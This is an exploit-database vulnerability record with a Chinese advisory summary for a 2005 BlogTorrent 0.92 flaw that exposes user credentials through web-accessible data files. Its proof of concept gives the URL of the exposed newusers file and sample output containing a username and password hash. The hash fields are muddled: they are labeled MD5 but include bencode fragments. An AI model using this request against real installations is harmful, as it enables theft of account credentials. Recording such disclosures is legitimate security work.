https://www.exploit-db.com/exploits/1097
https://www.securityfocus.com/bid/89714
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-130

BlogTorrent是一套BT资源网站系统。BlogTorrent0.92及之前版本存在信息泄露漏洞。由于将敏感文件存储在Web文档根目录下的data或torrents目录中，又缺乏充分的访问控制，使得远程攻击者可获取帐户名和密码Hash之类的敏感信息。

# Edited for easy info. /str0ke

Software:    BlogTorrent 0.92 <=
Vendor:      http://www.blogtorrent.com/
Author:      LazyCrs && pjphem
Date:        10/07/2005
Type:        Remote/Local User Password Disclosure

#0x03 - POC

http://test/path_of_blog/data/newusers
=
d40:14ae696abdca1688dd577fe486c3981f331457b0d7:Createdi1120957648e5:Email17:email@email4:Hash40:d7b82821fe725305bded2fab9e91ed1e0e6fd93bee

Username (crypt in md5) ->  14ae696abdca1688dd577fe486c3981f331457b0d7
Password  (crypt in md5) ->  d7b82821fe725305bded2fab9e91ed1e0e6fd93bee

#LazyCrs[AT]GMail[DOT]com - pjphem[AT]mybox[DOT]it
#FREE RAFA! FREE RAFA! FREE RAFA!

# milw0rm.com [2005-07-11]

Blog Torrent Blog Torrent 0.92

来源:SECTRACK
名称:1014449
链接:http://securitytracker.com/id?1014449
来源:SECUNIA
名称:15983
链接:http://secunia.com/advisories/15983
来源:BUGTRAQ
名称:20050711blogtorrentremote/localuserpassworddisclosure
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112110868021563&w;=2